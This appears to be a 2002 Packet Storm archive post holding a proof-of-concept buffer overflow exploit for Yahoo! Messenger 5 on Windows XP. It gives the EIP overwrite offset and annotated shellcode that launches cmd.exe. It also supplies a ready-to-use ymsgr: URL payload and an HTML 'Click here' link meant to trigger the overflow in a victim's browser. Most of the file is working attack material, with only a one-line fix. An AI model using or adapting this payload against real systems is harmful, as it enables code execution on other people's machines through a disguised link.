ymxp.txt

2002-06-0300:00:00
packetstormsecurity.com
`Yahoo! Messenger (5,0,0,1061) Buffer Overflow Exploit for Win XP Pro  
  
  
  
  
  
Intro:  
Proof of concept code for YM Buffer Overflow as discovered in:  
http://packetstorm.decepticons.org/advisories/misc/yahoo-im.txt  
  
  
  
  
  
Code flow:  
Overwrite EIP at 218  
Point EIP to a "RET" in the memory  
"RET" jumps to beginning of shellcode  
Shellcode spawns cmd.exe  
Terminate YM gracefully :)  
  
  
  
  
  
'shellcode':  
  
55 push ebp  
54 push esp  
5D pop ebp  
33 FF xor edi,edi  
57 push edi  
C6 45 FC 63 mov byte ptr [ebp-04h],'c'  
C6 45 FD 6D mov byte ptr [ebp-03h],'m'  
C6 45 FE 64 mov byte ptr [ebp-02h],'d'  
57 push edi  
C6 45 F8 03 mov byte ptr[ebp-08h],3 ;Max window  
8D 45 FC lea eax,[ebp-4h]  
50 push eax  
B8 7E684C67 mov eax,7E684C67h ;CreateProcess@77E684C6h  
C1 C8 04 ror eax, 4  
FF D0 call eax  
B8 7EB854B7 mov eax,7EB854B7h ;FatalExit@77EB854Bh  
C1 C8 04 ror eax, 4  
FF D0 call eax  
  
  
  
  
  
Test:  
Parse this to your IE browser  
ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77  
  
Or put this into an HTML file  
<a href="ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77">Click here</a>  
  
  
  
  
  
Fix:  
Update YM at http://messenger.yahoo.com/  
  
  
  
  
Credit:  
[email protected]  
31 May 2002  
`
JSON